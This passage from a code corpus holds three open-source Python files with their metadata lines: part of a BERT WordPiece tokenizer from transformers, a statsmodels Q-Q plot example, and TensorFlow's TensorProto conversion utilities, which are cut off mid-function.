self.do_basic_tokenize = do_basic_tokenize
if do_basic_tokenize:
self.basic_tokenizer = BasicTokenizer(
do_lower_case=do_lower_case,
never_split=never_split,
tokenize_chinese_chars=tokenize_chinese_chars,
strip_accents=strip_accents,
)
self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab, unk_token=str(unk_token))
super().__init__(
do_lower_case=do_lower_case,
do_basic_tokenize=do_basic_tokenize,
never_split=never_split,
unk_token=unk_token,
sep_token=sep_token,
pad_token=pad_token,
cls_token=cls_token,
mask_token=mask_token,
tokenize_chinese_chars=tokenize_chinese_chars,
strip_accents=strip_accents,
clean_up_tokenization_spaces=clean_up_tokenization_spaces,
**kwargs,
)
@property
def do_lower_case(self):
return self.basic_tokenizer.do_lower_case
@property
def vocab_size(self):
return len(self.vocab)
def get_vocab(self):
return dict(self.vocab, **self.added_tokens_encoder)
def _tokenize(self, text, split_special_tokens=False):
split_tokens = []
if self.do_basic_tokenize:
for token in self.basic_tokenizer.tokenize(
text, never_split=self.all_special_tokens if not split_special_tokens else None
):
# If the token is part of the never_split set
if token in self.basic_tokenizer.never_split:
split_tokens.append(token)
else:
split_tokens += self.wordpiece_tokenizer.tokenize(token)
else:
split_tokens = self.wordpiece_tokenizer.tokenize(text)
return split_tokens
def _convert_token_to_id(self, token):
"""Converts a token (str) in an id using the vocab."""
return self.vocab.get(token, self.vocab.get(self.unk_token))
def _convert_id_to_token(self, index):
"""Converts an index (integer) in a token (str) using the vocab."""
return self.ids_to_tokens.get(index, self.unk_token)
def convert_tokens_to_string(self, tokens):
"""Converts a sequence of tokens (string) in a single string."""
out_string = " ".join(tokens).replace(" ##", "").strip()
return out_string
def build_inputs_with_special_tokens(
self, token_ids_0: list[int], token_ids_1: list[int] | None = None
) -> list[int]:
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. A BERT sequence has the following format:
- single sequence: `[CLS] X [SEP]`
- pair of sequences: `[CLS] A [SEP] B [SEP]`
Args:
token_ids_0 (`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens.
"""
if token_ids_1 is None:
return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
cls = [self.cls_token_id]
sep = [self.sep_token_id]
return cls + token_ids_0 + sep + token_ids_1 + sep
def get_special_tokens_mask(
self, token_ids_0: list[int], token_ids_1: list[int] | None = None, already_has_special_tokens: bool = False
) -> list[int]:
"""
Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer `prepare_for_model` method.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
already_has_special_tokens (`bool`, *optional*, defaults to `False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
return super().get_special_tokens_mask(
token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
)
if token_ids_1 is not None:
return [1] + ([0] * len(token_ids_0)) + [1] + ([0] * len(token_ids_1)) + [1]
return [1] + ([0] * len(token_ids_0)) + [1]
def save_vocabulary(self, save_directory: str, filename_prefix: str | None = None) -> tuple[str]:
index = 0
if os.path.isdir(save_directory):
vocab_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"]
)
else:
vocab_file = (filename_prefix + "-" if filename_prefix else "") + save_directory
with open(vocab_file, "w", encoding="utf-8") as writer:
for token, token_index in sorted(self.vocab.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning(
f"Saving vocabulary to {vocab_file}: vocabulary indices are not consecutive."
" Please check that the vocabulary is not corrupted!"
)
index = token_index
writer.write(token + "\n")
index += 1
return (vocab_file,)
class BasicTokenizer:
"""
Constructs a BasicTokenizer that will run basic tokenization (punctuation splitting, lower casing, etc.).
Args:
do_lower_case (`bool`, *optional*, defaults to `True`):
Whether or not to lowercase the input when tokenizing.
never_split (`Iterable`, *optional*):
Collection of tokens which will never be split during tokenization. Only has an effect when
`do_basic_tokenize=True`
tokenize_chinese_chars (`bool`, *optional*, defaults to `True`):
Whether or not to tokenize Chinese characters.
This should likely be deactivated for Japanese (see this
[issue](https://github.com/huggingface/transformers/issues/328)).
strip_accents (`bool`, *optional*):
Whether or not to strip all accents. If this option is not specified, then it will be determined by the
value for `lowercase` (as in the original BERT).
do_split_on_punc (`bool`, *optional*, defaults to `True`):
In some instances we want to skip the basic punctuation splitting so that later tokenization can capture
the full context of the words, such as contractions.
"""
def __init__(
self,
do_lower_case=True,
never_split=None,
tokenize_chinese_chars=True,
strip_accents=None,
do_split_on_punc=True,
):
if never_split is None:
never_split = []
self.do_lower_case = do_lower_case
self.never_split = set(never_split)
self.tokenize_chinese_chars = tokenize_chinese_chars
self.strip_accents = strip_accents
self.do_split_on_punc = do_split_on_punc
def tokenize(self, text, never_split=None):
"""
Basic Tokenization of a piece of text. For sub-word tokenization, see WordPieceTokenizer.
Args:
never_split (`List[str]`, *optional*)
Kept for backward compatibility purposes. Now implemented directly at the base class level (see
[`PreTrainedTokenizer.tokenize`]) List of token not to split.
"""
# union() returns a new set by concatenating the two sets.
never_split = self.never_split.union(set(never_split)) if never_split else self.never_split
text = self._clean_text(text)
# This was added on November 1st, 2018 for the multilingual and Chinese
# models. This is also applied to the English models now, but it doesn't
# matter since the English models were not trained on any Chinese data
# and generally don't have any Chinese data in them (there are Chinese
# characters in the vocabulary because Wikipedia does have some Chinese
# words in the English Wikipedia.).
if self.tokenize_chinese_chars:
text = self._tokenize_chinese_chars(text)
# prevents treating the same character with different unicode codepoints as different characters
unicode_normalized_text = unicodedata.normalize("NFC", text)
orig_tokens = whitespace_tokenize(unicode_normalized_text)
split_tokens = []
for token in orig_tokens:
if token not in never_split:
if self.do_lower_case:
token = token.lower()
if self.strip_accents is not False:
token = self._run_strip_accents(token)
elif self.strip_accents:
token = self._run_strip_accents(token)
split_tokens.extend(self._run_split_on_punc(token, never_split))
output_tokens = whitespace_tokenize(" ".join(split_tokens))
return output_tokens
def _run_strip_accents(self, text):
"""Strips accents from a piece of text."""
text = unicodedata.normalize("NFD", text)
output = []
for char in text:
cat = unicodedata.category(char)
if cat == "Mn":
continue
output.append(char)
return "".join(output)
def _run_split_on_punc(self, text, never_split=None):
"""Splits punctuation on a piece of text."""
if not self.do_split_on_punc or (never_split is not None and text in never_split):
return [text]
chars = list(text)
i = 0
start_new_word = True
output = []
while i < len(chars):
char = chars[i]
if _is_punctuation(char):
output.append([char])
start_new_word = True
else:
if start_new_word:
output.append([])
start_new_word = False
output[-1].append(char)
i += 1
return ["".join(x) for x in output]
def _tokenize_chinese_chars(self, text):
"""Adds whitespace around any CJK character."""
output = []
for char in text:
cp = ord(char)
if self._is_chinese_char(cp):
output.append(" ")
output.append(char)
output.append(" ")
else:
output.append(char)
return "".join(output)
def _is_chinese_char(self, cp):
"""Checks whether CP is the codepoint of a CJK character."""
# This defines a "chinese character" as anything in the CJK Unicode block:
# https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block)
#
# Note that the CJK Unicode block is NOT all Japanese and Korean characters,
# despite its name. The modern Korean Hangul alphabet is a different block,
# as is Japanese Hiragana and Katakana. Those alphabets are used to write
# space-separated words, so they are not treated specially and handled
# like the all of the other languages.
if (
(cp >= 0x4E00 and cp <= 0x9FFF)
or (cp >= 0x3400 and cp <= 0x4DBF)
or (cp >= 0x20000 and cp <= 0x2A6DF)
or (cp >= 0x2A700 and cp <= 0x2B73F)
or (cp >= 0x2B740 and cp <= 0x2B81F)
or (cp >= 0x2B820 and cp <= 0x2CEAF)
or (cp >= 0xF900 and cp <= 0xFAFF)
or (cp >= 0x2F800 and cp <= 0x2FA1F)
):
return True
return False
def _clean_text(self, text):
"""Performs invalid character removal and whitespace cleanup on text."""
output = []
for char in text:
cp = ord(char)
if cp == 0 or cp == 0xFFFD or _is_control(char):
continue
if _is_whitespace(char):
output.append(" ")
else:
output.append(char)
return "".join(output)
class WordpieceTokenizer:
"""Runs WordPiece tokenization."""
def __init__(self, vocab, unk_token, max_input_chars_per_word=100):
self.vocab = vocab
self.unk_token = unk_token
self.max_input_chars_per_word = max_input_chars_per_word
def tokenize(self, text):
"""
Tokenizes a piece of text into its word pieces. This uses a greedy longest-match-first algorithm to perform
tokenization using the given vocabulary.
For example, `input = "unaffable"` will return as output `["un", "##aff", "##able"]`.
Args:
text: A single token or whitespace separated tokens. This should have
already been passed through *BasicTokenizer*.
Returns:
A list of wordpiece tokens.
"""
output_tokens = []
for token in whitespace_tokenize(text):
chars = list(token)
if len(chars) > self.max_input_chars_per_word:
output_tokens.append(self.unk_token)
continue
is_bad = False
start = 0
sub_tokens = []
while start < len(chars):
end = len(chars)
cur_substr = None
while start < end:
substr = "".join(chars[start:end])
if start > 0:
substr = "##" + substr
if substr in self.vocab:
cur_substr = substr
break
end -= 1
if cur_substr is None:
is_bad = True
break
sub_tokens.append(cur_substr)
start = end
if is_bad:
output_tokens.append(self.unk_token)
else:
output_tokens.extend(sub_tokens)
return output_tokens
__all__ = ["BasicTokenizer", "BertTokenizerLegacy", "WordpieceTokenizer"]
|
python
|
github
|
https://github.com/huggingface/transformers
|
src/transformers/models/bert/tokenization_bert_legacy.py
|
# -*- coding: utf-8 -*-
"""
Created on Sun May 06 05:32:15 2012
Author: Josef Perktold
editted by: Paul Hobson (2012-08-19)
"""
# example with the new ProbPlot class
from matplotlib import pyplot as plt
import numpy as np
from scipy import stats
import statsmodels.api as sm
#example from docstring
data = sm.datasets.longley.load(as_pandas=False)
data.exog = sm.add_constant(data.exog, prepend=True)
mod_fit = sm.OLS(data.endog, data.exog).fit()
res = mod_fit.resid
left = -1.8 #x coordinate for text insert
fig = plt.figure()
ax = fig.add_subplot(2, 2, 1)
sm.graphics.qqplot(res, ax=ax)
top = ax.get_ylim()[1] * 0.75
txt = ax.text(left, top, 'no keywords', verticalalignment='top')
txt.set_bbox(dict(facecolor='k', alpha=0.1))
ax = fig.add_subplot(2, 2, 2)
sm.graphics.qqplot(res, line='s', ax=ax)
top = ax.get_ylim()[1] * 0.75
txt = ax.text(left, top, "line='s'", verticalalignment='top')
txt.set_bbox(dict(facecolor='k', alpha=0.1))
ax = fig.add_subplot(2, 2, 3)
sm.graphics.qqplot(res, line='45', fit=True, ax=ax)
ax.set_xlim(-2, 2)
top = ax.get_ylim()[1] * 0.75
txt = ax.text(left, top, "line='45', \nfit=True", verticalalignment='top')
txt.set_bbox(dict(facecolor='k', alpha=0.1))
ax = fig.add_subplot(2, 2, 4)
sm.graphics.qqplot(res, dist=stats.t, line='45', fit=True, ax=ax)
ax.set_xlim(-2, 2)
top = ax.get_ylim()[1] * 0.75
txt = ax.text(left, top, "dist=stats.t, \nline='45', \nfit=True",
verticalalignment='top')
txt.set_bbox(dict(facecolor='k', alpha=0.1))
fig.tight_layout()
plt.gcf()
x = np.random.normal(loc=8.25, scale=3.5, size=37)
y = np.random.normal(loc=8.00, scale=3.25, size=37)
pp_x = sm.ProbPlot(x, fit=True)
pp_y = sm.ProbPlot(y, fit=True)
# probability of exceedance
fig2 = pp_x.probplot(exceed=True)
# compare x quantiles to y quantiles
fig3 = pp_x.qqplot(other=pp_y, line='45')
# same as above with probabilities/percentiles
fig4 = pp_x.ppplot(other=pp_y, line='45')
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities to create TensorProtos."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import six
from tensorflow.core.framework import tensor_pb2
from tensorflow.core.framework import tensor_shape_pb2
from tensorflow.python.framework import tensor_shape
from tensorflow.python.util import compat
# TODO(opensource): Add support for pyx_library in the open-source build.
# For now, we use the slow versions that fast_tensor_util replaces.
# pylint: disable=g-import-not-at-top
try:
from tensorflow.python.framework import fast_tensor_util
_FAST_TENSOR_UTIL_AVAILABLE = True
except ImportError:
_FAST_TENSOR_UTIL_AVAILABLE = False
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
# pylint: enable=g-import-not-at-top
def ExtractBitsFromFloat16(x):
return np.asscalar(np.asarray(x, dtype=np.float16).view(np.uint16))
def SlowAppendFloat16ArrayToTensorProto(tensor_proto, proto_values):
tensor_proto.half_val.extend([
ExtractBitsFromFloat16(x) for x in proto_values])
if _FAST_TENSOR_UTIL_AVAILABLE:
_NP_TO_APPEND_FN = {
# TODO(sesse): We should have a
# fast_tensor_util.AppendFloat16ArrayToTensorProto,
# but it seems np.float16_t doesn't exist?
np.float16: SlowAppendFloat16ArrayToTensorProto,
np.float32: fast_tensor_util.AppendFloat32ArrayToTensorProto,
np.float64: fast_tensor_util.AppendFloat64ArrayToTensorProto,
np.int32: fast_tensor_util.AppendInt32ArrayToTensorProto,
np.int64: fast_tensor_util.AppendInt64ArrayToTensorProto,
np.uint8: fast_tensor_util.AppendUInt8ArrayToTensorProto,
np.uint16: fast_tensor_util.AppendUInt16ArrayToTensorProto,
np.int8: fast_tensor_util.AppendInt8ArrayToTensorProto,
np.int16: fast_tensor_util.AppendInt16ArrayToTensorProto,
np.complex64: fast_tensor_util.AppendComplex64ArrayToTensorProto,
np.complex128: fast_tensor_util.AppendComplex128ArrayToTensorProto,
np.object: fast_tensor_util.AppendObjectArrayToTensorProto,
np.bool: fast_tensor_util.AppendBoolArrayToTensorProto,
dtypes.qint8.as_numpy_dtype:
fast_tensor_util.AppendInt8ArrayToTensorProto,
dtypes.quint8.as_numpy_dtype:
fast_tensor_util.AppendUInt8ArrayToTensorProto,
dtypes.qint16.as_numpy_dtype:
fast_tensor_util.AppendInt8ArrayToTensorProto,
dtypes.quint16.as_numpy_dtype:
fast_tensor_util.AppendUInt8ArrayToTensorProto,
dtypes.qint32.as_numpy_dtype:
fast_tensor_util.AppendInt32ArrayToTensorProto,
# NOTE(touts): Intentionally no way to feed a DT_BFLOAT16.
}
else:
def SlowAppendFloat32ArrayToTensorProto(tensor_proto, proto_values):
tensor_proto.float_val.extend([np.asscalar(x) for x in proto_values])
def SlowAppendFloat64ArrayToTensorProto(tensor_proto, proto_values):
tensor_proto.double_val.extend([np.asscalar(x) for x in proto_values])
def SlowAppendIntArrayToTensorProto(tensor_proto, proto_values):
tensor_proto.int_val.extend([np.asscalar(x) for x in proto_values])
def SlowAppendQIntArrayToTensorProto(tensor_proto, proto_values):
tensor_proto.int_val.extend([np.asscalar(x[0]) for x in proto_values])
def SlowAppendInt64ArrayToTensorProto(tensor_proto, proto_values):
tensor_proto.int64_val.extend([np.asscalar(x) for x in proto_values])
def SlowAppendComplex64ArrayToTensorProto(tensor_proto, proto_values):
tensor_proto.scomplex_val.extend([np.asscalar(v)
for x in proto_values
for v in [x.real, x.imag]])
def SlowAppendComplex128ArrayToTensorProto(tensor_proto, proto_values):
tensor_proto.dcomplex_val.extend([np.asscalar(v)
for x in proto_values
for v in [x.real, x.imag]])
def SlowAppendObjectArrayToTensorProto(tensor_proto, proto_values):
tensor_proto.string_val.extend([compat.as_bytes(x) for x in proto_values])
def SlowAppendBoolArrayToTensorProto(tensor_proto, proto_values):
tensor_proto.bool_val.extend([np.asscalar(x) for x in proto_values])
_NP_TO_APPEND_FN = {
np.float16: SlowAppendFloat16ArrayToTensorProto,
np.float32: SlowAppendFloat32ArrayToTensorProto,
np.float64: SlowAppendFloat64ArrayToTensorProto,
np.int32: SlowAppendIntArrayToTensorProto,
np.int64: SlowAppendInt64ArrayToTensorProto,
np.uint8: SlowAppendIntArrayToTensorProto,
np.uint16: SlowAppendIntArrayToTensorProto,
np.int8: SlowAppendIntArrayToTensorProto,
np.int16: SlowAppendIntArrayToTensorProto,
np.complex64: SlowAppendComplex64ArrayToTensorProto,
np.complex128: SlowAppendComplex128ArrayToTensorProto,
np.object: SlowAppendObjectArrayToTensorProto,
np.bool: SlowAppendBoolArrayToTensorProto,
dtypes.qint8.as_numpy_dtype: SlowAppendQIntArrayToTensorProto,
dtypes.quint8.as_numpy_dtype: SlowAppendQIntArrayToTensorProto,
dtypes.qint16.as_numpy_dtype: SlowAppendQIntArrayToTensorProto,
dtypes.quint16.as_numpy_dtype: SlowAppendQIntArrayToTensorProto,
dtypes.qint32.as_numpy_dtype: SlowAppendQIntArrayToTensorProto,
# NOTE(touts): Intentionally no way to feed a DT_BFLOAT16.
}
def GetFromNumpyDTypeDict(dtype_dict, dtype):
# NOTE: dtype_dict.get(dtype) always returns None.
for key, val in six.iteritems(dtype_dict):
if key == dtype:
return val
return None
def GetNumpyAppendFn(dtype):
# numpy dtype for strings are variable length. We can not compare
# dtype with a single constant (np.string does not exist) to decide
# dtype is a "string" type. We need to compare the dtype.type to be
# sure it's a string type.
if dtype.type == np.string_ or dtype.type == np.unicode_:
if _FAST_TENSOR_UTIL_AVAILABLE:
return fast_tensor_util.AppendObjectArrayToTensorProto
else:
return SlowAppendObjectArrayToTensorProto
return GetFromNumpyDTypeDict(_NP_TO_APPEND_FN, dtype)
def TensorShapeProtoToList(shape):
"""Convert a TensorShape to a list.
Args:
shape: A TensorShapeProto.
Returns:
List of integers representing the dimensions of the tensor.
"""
return [dim.size for dim in shape.dim]
def _GetDenseDimensions(list_of_lists):
"""Returns the inferred dense dimensions of a list of lists."""
if not isinstance(list_of_lists, (list, tuple)):
return []
elif not list_of_lists:
return [0]
else:
return [len(list_of_lists)] + _GetDenseDimensions(list_of_lists[0])
def _FlattenToStrings(nested_strings):
if isinstance(nested_strings, (list, tuple)):
for inner in nested_strings:
for flattened_string in _FlattenToStrings(inner):
yield flattened_string
else:
yield nested_strings
_TENSOR_CONTENT_TYPES = frozenset([
dtypes.float32, dtypes.float64, dtypes.int32, dtypes.uint8, dtypes.int16,
dtypes.int8, dtypes.int64, dtypes.qint8, dtypes.quint8, dtypes.qint16,
dtypes.quint16, dtypes.qint32,
])
class _Message(object):
def __init__(self, message):
self._message = message
def __repr__(self):
return self._message
def _FirstNotNone(l):
for x in l:
if x is not None:
if isinstance(x, ops.Tensor):
return _Message("list containing Tensors")
else:
return x
return None
def _NotNone(v):
if v is None:
return _Message("None")
else:
return v
def _FilterTuple(v):
if not isinstance(v, (list, tuple)):
return v
if isinstance(v, tuple):
if not any(isinstance(x, (list, tuple)) for x in v):
return None
if isinstance(v, list):
if not any(isinstance(x, (list, tuple)) for x in v):
return _FirstNotNone([None if isinstance(x, (list, tuple)) else x for x in v])
return _FirstNotNone([_FilterTuple(x) for x in v])
def _FilterInt(v):
if isinstance(v, (list, tuple)):
return _FirstNotNone([_FilterInt(x) for x in v])
return None if isinstance(v, compat.integral_types) else _NotNone(v)
def _FilterFloat(v):
if isinstance(v, (list, tuple)):
return _FirstNotNone([_FilterFloat(x) for x in v])
return None if isinstance(v, compat.real_types) else _NotNone(v)
def _FilterComplex(v):
if isinstance(v, (list, tuple)):
return _FirstNotNone([_FilterComplex(x) for x in v])
return None if isinstance(v, compat.complex_types) else _NotNone(v)
def _FilterStr(v):
if isinstance(v, (list, tuple)):
return _FirstNotNone([_FilterStr(x) for x in v])
if isinstance(v, compat.bytes_or_text_types):
return None
else:
return _NotNone(v)
def _FilterBool(v):
if isinstance(v, (list, tuple)):
return _FirstNotNone([_FilterBool(x) for x in v])
return None if isinstance(v, bool) else _NotNone(v)
def _FilterNotTensor(v):
if isinstance(v, (list, tuple)):
return _FirstNotNone([_FilterNotTensor(x) for x in v])
return str(v) if isinstance(v, ops.Tensor) else None
_TF_TO_IS_OK = {
dtypes.bool: [_FilterBool],
dtypes.complex128: [_FilterComplex],
dtypes.complex64: [_FilterComplex],
dtypes.float32: [_FilterFloat],
dtypes.float64: [_FilterFloat],
dtypes.int16: [_FilterInt],
dtypes.int32: [_FilterInt],
dtypes.int64: [_FilterInt],
dtypes.int8: [_FilterInt],
dtypes.qint16: [_FilterInt, _FilterTuple],
dtypes.qint32: [_FilterInt, _FilterTuple],
dtypes.qint8: [_FilterInt, _FilterTuple],
dtypes.quint16: [_FilterInt, _FilterTuple],
dtypes.quint8: [_FilterInt, _FilterTuple],
dtypes.string: [_FilterStr],
dtypes.uint16: [_FilterInt],
dtypes.uint8: [_FilterInt],
}
def _AssertCompatible(values, dtype):
fn_list = _TF_TO_IS_OK.get(dtype, [_FilterNotTensor])
mismatch = _FirstNotNone([fn(values) for fn in fn_list])
if mismatch is not None:
if dtype is None:
raise TypeError("List of Tensors when single Tensor expected")
else:
raise TypeError("Expected %s, got %s of type '%s' instead." %
(dtype.name, repr(mismatch), type(mismatch).__name__))
def make_tensor_proto(values, dtype=None, shape=None, verify_shape=False):
"""Create a TensorProto.
Args:
values: Values to put in the TensorProto.
dtype: Optional tensor_pb2 DataType value.
shape: List of integers representing the dimensions of tensor.
verify_shape: Boolean that enables verification of a shape of values.
Returns:
A TensorProto. Depending on the type, it may contain data in the
"tensor_content" attribute, which is not directly useful to Python programs.
To access the values you should convert the proto back to a numpy ndarray
with tensor_util.MakeNdarray(proto).
Raises:
TypeError: if unsupported types are provided.
ValueError: if arguments have inappropriate values or if verify_shape is
True and shape of values is not equals to a shape from the argument.
make_tensor_proto accepts "values" of a python scalar, a python list, a
numpy ndarray, or a numpy scalar.
If "values" is a python scalar or a python list, make_tensor_proto
first convert it to numpy ndarray. If dtype is None, the
conversion tries its best to infer the right numpy data
type. Otherwise, the resulting numpy array has a compatible data
type with the given dtype.
In either case above, the numpy ndarray (either the caller provided
or the auto converted) must have the compatible type with dtype.
make_tensor_proto then converts the numpy array to a tensor proto.
If "shape" is None, the resulting tensor proto represents the numpy
array precisely.
Otherwise, "shape" specifies the tensor's shape and the numpy array
can not have more elements than what "shape" specifies.
"""
if dtype:
dtype = dtypes.as_dtype(dtype)
is_quantized = (dtype in [dtypes.qint8, dtypes.quint8, dtypes.qint16,
dtypes.quint16, dtypes.qint32])
# We first convert value to a numpy array or scalar.
if isinstance(values, (np.ndarray, np.generic)):
if dtype:
nparray = values.astype(dtype.as_numpy_dtype)
else:
nparray = values
elif callable(getattr(values, "__array__", None)):
# If a class has the __array__ method, then it is possible to convert
# to numpy array.
nparray = np.asarray(values, dtype=dtype)
else:
if values is None:
raise ValueError("None values not supported.")
# if dtype is provided, forces numpy array to be the type
# provided if possible.
if dtype and dtype.is_numpy_compatible:
np_dt = dtype.as_numpy_dtype
else:
np_dt = None
if np.prod(shape) == 0:
nparray = np.empty(shape, dtype=np_dt)
else:
_AssertCompatible(values, dtype)
nparray = np.array(values, dtype=np_dt)
# check to them.
# We need to pass in quantized values as tuples, so don't apply the shape
if (list(nparray.shape) != _GetDenseDimensions(values) and
not is_quantized):
raise ValueError("""Argument must be a dense tensor: %s"""
""" - got shape %s, but wanted %s.""" % (
values, list(nparray.shape),
_GetDenseDimensions(values)))
# python/numpy default float type is float64. We prefer float32 instead.
if (nparray.dtype == np.float64) and dtype is None:
nparray = nparray.astype(np.float32)
# python/numpy default int type is int64. We prefer int32 instead.
elif (nparray.dtype == np.int64) and dtype is None:
downcasted_array = nparray.astype(np.int32)
# Do not down cast if it leads to precision loss.
if np.array_equal(downcasted_array, nparray):
nparray = downcasted_array
# if dtype is provided, it must be compatible with what numpy
# conversion says.
numpy_dtype = dtypes.as_dtype(nparray.dtype)
if numpy_dtype is None:
raise TypeError("Unrecognized data type: %s" % nparray.dtype)
# If dtype was specified and is a quantized type, we convert
# numpy_dtype back into the quantized version.
if is_quantized:
numpy_dtype = dtype
if dtype is not None and (not hasattr(dtype, "base_dtype") or
dtype.base_dtype != numpy_dtype.base_dtype):
raise TypeError("Incompatible types: %s vs. %s" % (dtype, nparray.dtype))
# If shape is not given, get the shape from the numpy array.
if shape is None:
shape = nparray.shape
is_same_size = True
shape_size = nparray.size
else:
shape = [int(dim) for dim in shape]
shape_size = np.prod(shape)
is_same_size = shape_size == nparray.size
if verify_shape:
if not nparray.shape == tuple(shape):
raise TypeError("Expected Tensor's shape: %s, got %s." %
(tuple(shape), nparray.shape))
if nparray.size > shape_size:
raise ValueError(
"Too many elements provided. Needed at most %d, but received %d" %
(shape_size, nparray.size))
tensor_proto = tensor_pb2.TensorProto(
dtype=numpy_dtype.as_datatype_enum,
tensor_shape=tensor_shape.as_shape(shape).as_proto())
if is_same_size and numpy_dtype in _TENSOR_CONTENT_TYPES and shape_size > 1:
if nparray.size * nparray.itemsize >= (1 << 31):
raise ValueError(
"Cannot create a tensor proto whose content is larger than 2GB.")
tensor_proto.tensor_content = nparray.tostring()
return tensor_proto
# If we were not given values as a numpy array, compute the proto_values
# from the given values directly, to avoid numpy trimming nulls from the
# strings. Since values could be a list of strings, or a multi-dimensional
# list of lists that might or might not correspond to the given shape,
# we flatten it conservatively.
if numpy_dtype == dtypes.string and not isinstance(values, np.ndarray):
proto_values = _FlattenToStrings(values)
# At this point, values may be a list of objects that we could not
# identify a common type for (hence it was inferred as
# np.object/dtypes.string). If we are unable to convert it to a
# string, we raise a more helpful error message.
#
# Ideally, we'd be able to convert the elements of the list to a
# common type, but this type inference requires some thinking and
# so we defer it for now.
try:
str_values = [compat.as_bytes(x) for x in proto_values]
except TypeError:
raise TypeError("Failed to convert object of type %s to Tensor. "
"Contents: %s. Consider casting elements to a "
"supported type." % (type(values), values))
tensor_proto.string_val.extend(str_values)
return tensor_proto
# TensorFlow expects C order (a.k.a., eigen row major).
proto_values = nparray.ravel()
append_fn = GetNumpyAppendFn(proto_values.dtype)
if append_fn is None:
raise TypeError("Element type not supported in TensorProto: %s" %
numpy_dtype.name)
append_fn(tensor_proto, proto_values)
return tensor_proto
def MakeNdarray(tensor):
"""Create a numpy ndarray from a tensor.
Create a numpy ndarray with the same shape and data as the tensor.
Args:
tensor: A TensorProto.
Returns:
A numpy array with the tensor contents.
Raises:
TypeError: if tensor has unsupported type.
"""
shape = [d.size for d in tensor.tensor_shape.dim]
num_elements = np.prod(shape)
tensor_dtype = dtypes.as_dtype(tensor.dtype)
dtype = tensor_dtype.as_numpy_dtype
if tensor.tensor_content:
return np.fromstring(tensor.tensor_content, dtype=dtype).reshape(shape)
elif tensor_dtype == dtypes.float16:
# the half_val field of the TensorProto stores the binary representation
# of the fp16: we need to reinterpret this as a proper float16
if len(tensor.half_val) == 1:
tmp = np.array(tensor.half_val[0], dtype=np.uint16)
tmp.dtype = np.float16
return np.repeat(tmp, num_elements).reshape(shape)
else:
tmp = np.fromiter(tensor.half_val, dtype=np.uint16)
tmp.dtype = np.float16
return tmp.reshape(shape)
elif tensor_dtype == dtypes.float32:
if len(tensor.float_val) == 1:
return np.repeat(np.array(tensor.float_val[0], dtype=dtype),
num_elements).reshape(shape)
else:
return np.fromiter(tensor.float_val, dtype=dtype).reshape(shape)
elif tensor_dtype == dtypes.float64:
if len(tensor.double_val) == 1:
return np.repeat(np.array(tensor.double_val[0], dtype=dtype),
num_elements).reshape(shape)
else:
return np.fromiter(tensor.double_val, dtype=dtype).reshape(shape)
elif tensor_dtype in [dtypes.int32, dtypes.uint8, dtypes.uint16, dtypes.int16,
dtypes.int8, dtypes.qint32, dtypes.quint8, dtypes.qint8,
dtypes.qint16, dtypes.quint16, dtypes.bfloat16]:
if len(tensor.int_val) == 1:
return np.repeat(np.array(tensor.int_val[0], dtype=dtype),
num_elements).reshape(shape)
else:
return np.fromiter(tensor.int_val, dtype=dtype).reshape(shape)
elif tensor_dtype == dtypes.int64:
if len(tensor.int64_val) == 1:
return np.repeat(np.array(tensor.int64_val[0], dtype=dtype),
num_elements).reshape(shape)
else:
return np.fromiter(tensor.int64_val, dtype=dtype).reshape(shape)
elif tensor_dtype == dtypes.string:
if len(tensor.string_val) == 1:
return np.repeat(np.array(tensor.string_val[0], dtype=dtype),
num_elements).reshape(shape)
else:
return np.array([x for x in tensor.string_val],
dtype=dtype).reshape(shape)
elif tensor_dtype == dtypes.complex64:
it = iter(tensor.scomplex_val)
if len(tensor.scomplex_val) == 2:
return np.repeat(np.array(complex(tensor.scomplex_val[0],
tensor.scomplex_val[1]), dtype=dtype),
num_elements).reshape(shape)
else:
return np.array([complex(x[0], x[1]) for x in zip(it, it)],
dtype=dtype).reshape(shape)
elif tensor_dtype == dtypes.complex128:
it = iter(tensor.dcomplex_val)
if len(tensor.dcomplex_val) == 2:
return np.repeat(np.array(complex(tensor.dcomplex_val[0],
tensor.dcomplex_val[1]), dtype=dtype),
num_elements).reshape(shape)
else:
return np.array([complex(x[0], x[1]) for x in zip(it, it)],
dtype=dtype).reshape(shape)
elif tensor_dtype == dtypes.bool:
if len(tensor.bool_val) == 1:
return np.repeat(np.array(tensor.bool_val[0], dtype=dtype),
num_elements).reshape(shape)
else:
return np.fromiter(tensor.bool_val, dtype=dtype).reshape(shape)
else:
raise TypeError("Unsupported tensor type: %s" % tensor.dtype)
def ShapeEquals(tensor_proto, shape):
"""Returns True if "tensor_proto" has the given "shape".
Args:
tensor_proto: A TensorProto.
shape: A tensor shape, expressed as a TensorShape, list, or tuple.
Returns:
True if "tensor_proto" has the given "shape", otherwise False.
Raises:
TypeError: If "tensor_proto" is not a TensorProto, or shape is not a
TensorShape, list, or tuple.
"""
if not isinstance(tensor_proto, tensor_pb2.TensorProto):
